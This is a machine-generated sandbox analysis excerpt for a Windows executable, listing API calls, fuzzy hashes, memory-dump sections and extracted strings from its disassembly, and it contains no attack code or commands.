                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CE8FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CE8FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CE8FCC
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                            • Instruction ID: 118f242b147a4089c9d29f1e4edc54909f5b5d399a371ad9a92371d69eb81af4
                                                            • Opcode Fuzzy Hash: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                            • Instruction Fuzzy Hash: 1231C275901228ABCB21DF65DC89BDDBBB8BF08310F5041EAE41CA7250EB709F858F55
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: 7c510de64841e7e59483e8ffbea6c7aa83138824b2018a20e7987abacc7ac298
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 5F022D71E012199BDF14CFA9C8806ADB7F5FF48314F158269E92AE7384D731AE41CB90
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CFE72C,?,?), ref: 00CDAF84
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                            • Instruction ID: f8cca00918f375a7ee0bcde4675e4bca1212bf0ce74e007ee70b73883032f57f
                                                            • Opcode Fuzzy Hash: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                            • Instruction Fuzzy Hash: 8D015E3A100348BAD7109F64EC45FAE77B8EF08750F108422FA05D72A0D7709965CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(00CC6DDF,00000000,00000400), ref: 00CC6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CC6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CF19EF,?,?,00000008,?,?,00CF168F,00000000), ref: 00CF1C21
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDF66A
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CDF3A5), ref: 00CDF9DA
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            APIs
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7f57f11d5f313b0befa4210889344c6598b7e04a1cc343691f1f39d26a216d7
                                                            • Instruction ID: ec66eb155e3c13712036ee14e0958eab93a223787c2a62ba54d81ffba5ee5f88
                                                            • Opcode Fuzzy Hash: e7f57f11d5f313b0befa4210889344c6598b7e04a1cc343691f1f39d26a216d7
                                                            • Instruction Fuzzy Hash: 2DE128755083948FC304CF29D89096ABFF0AF9A310F45495EF9D897392C235EA19DFA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction ID: ae8b1a342f7841b3e35451c7bde938ed2b53b82941bd6f8fc60a1bdaa7945338
                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction Fuzzy Hash: 789145B02003499BDB2CEF68D899BBE77D5EB60304F10092EE796873C2DB749646D352
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 59add1a23be4f4217d4a2af988b56b097ea5d4b4075c0942baf6a74c3e6c820a
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 49813B713043469BDB2CDE68D8D5BBD77D4AB91308F00092FFB968B382DA70C9869756
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b21e7eb4111701e9fcefaa24d712da6b921c9900bd38efe16df512b79af1ef13
                                                            • Instruction ID: 5165a2e02f586c00ce4fff492c5b405c532668a075dd162694359eaf3e13a50b
                                                            • Opcode Fuzzy Hash: b21e7eb4111701e9fcefaa24d712da6b921c9900bd38efe16df512b79af1ef13
                                                            • Instruction Fuzzy Hash: 4561CE75A00FC957CE389A6B58927BE2394EF0134CF14051AE763DF2D2D691DF429315
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction ID: 720fbb2404c505c779ef9bcbd4913ef5a22e2bcc6c05a53a434c4f4322c7446c
                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction Fuzzy Hash: DE514771600FC857DF3889AB8556FBF63C59B0270CF180919F8A3DB282C615EF4593A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9e8f863423ef4e4540aa3dd23da30d753adef11de3c81f3744518a01fde8c4a
                                                            • Instruction ID: cbd4fcb8d72f10f3037188f29dcffc4ef13c216df833b8a843ac56a5aa4b8320
                                                            • Opcode Fuzzy Hash: c9e8f863423ef4e4540aa3dd23da30d753adef11de3c81f3744518a01fde8c4a
                                                            • Instruction Fuzzy Hash: B651D3715083D58FD712CF24C18096EBFE2AE9A714F4909ADE4E95B243C231DB4BDB62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                            • Instruction ID: 94482213c493999be2c0142c345e7507de57e993577bd0e967719f7bd64c6981
                                                            • Opcode Fuzzy Hash: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                            • Instruction Fuzzy Hash: DF51E2B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 06d3a27e9a71f61af07d947a22166c4eb594c98390c8c90c9b059b12e6351926
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: D1312AB1A1474A8FCB18DF28C85126EBBE0FB95304F50452EE5D5C7781C734EA0ACB92
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CCE30E
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                              • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D01030,00000200,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                            • _strlen.LIBCMT ref: 00CCE32F
                                                            • SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                            • GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                            • GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CCE475
                                                            • GetWindowRect.USER32(?,?), ref: 00CCE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 00CCE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 00CCE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 00CCE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 00CCE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 00CCE58D
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00CECB66
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC71E
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC730
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC742
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC754
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC766
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC778
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC78A
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC79C
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7AE
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7C0
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7D2
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7E4
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7F6
                                                            • _free.LIBCMT ref: 00CECB5B
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CECB7D
                                                            • _free.LIBCMT ref: 00CECB92
                                                            • _free.LIBCMT ref: 00CECB9D
                                                            • _free.LIBCMT ref: 00CECBBF
                                                            • _free.LIBCMT ref: 00CECBD2
                                                            • _free.LIBCMT ref: 00CECBE0
                                                            • _free.LIBCMT ref: 00CECBEB
                                                            • _free.LIBCMT ref: 00CECC23
                                                            • _free.LIBCMT ref: 00CECC2A
                                                            • _free.LIBCMT ref: 00CECC47
                                                            • _free.LIBCMT ref: 00CECC5F
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 00CDD6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00CDD6ED
                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDD709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CDD720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDD734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CDD75D
                                                            • DeleteObject.GDI32(00000000), ref: 00CDD764
                                                            • GetWindow.USER32(00000000,00000002), ref: 00CDD76D
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            APIs
                                                            • _free.LIBCMT ref: 00CE9705
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CE9711
                                                            • _free.LIBCMT ref: 00CE971C
                                                            • _free.LIBCMT ref: 00CE9727
                                                            • _free.LIBCMT ref: 00CE9732
                                                            • _free.LIBCMT ref: 00CE973D
                                                            • _free.LIBCMT ref: 00CE9748
                                                            • _free.LIBCMT ref: 00CE9753
                                                            • _free.LIBCMT ref: 00CE975E
                                                            • _free.LIBCMT ref: 00CE976C
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                            • _wcslen.LIBCMT ref: 00CC7013
                                                            • _wcslen.LIBCMT ref: 00CC7084
                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CD9736
                                                            • _wcslen.LIBCMT ref: 00CD97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00CD97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CD9806
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1116704506-4209811716
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CDB650
                                                            • SetWindowTextW.USER32(?,?), ref: 00CDB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 00CDB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CDB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CDB694
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A4F5137B,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00CDFE1F
                                                            • _com_issue_error.COMSUPP ref: 00CDFE48
                                                            • _com_issue_error.COMSUPP ref: 00CDFE52
                                                            • GetLastError.KERNEL32(80070057,A4F5137B,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE57
                                                            • _com_issue_error.COMSUPP ref: 00CDFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE80
                                                            • _com_issue_error.COMSUPP ref: 00CDFE93
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CC93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CC93C9
                                                              • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                            • _swprintf.LIBCMT ref: 00CC9465
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 00CC94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 00CC9514
                                                            Strings
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 00CD122E
                                                              • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CD1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CD1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CD1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CD12CF
                                                            • __aullrem.LIBCMT ref: 00CD1379
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CC2536
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: 1a9640d37d13ee7d65a8729a9628e20b8d4c6299fa9fd6c11fec41118a4835b8
